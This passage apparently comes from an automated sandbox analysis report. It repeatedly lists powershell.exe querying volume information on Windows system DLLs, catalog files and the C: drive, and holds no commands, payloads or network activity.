                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
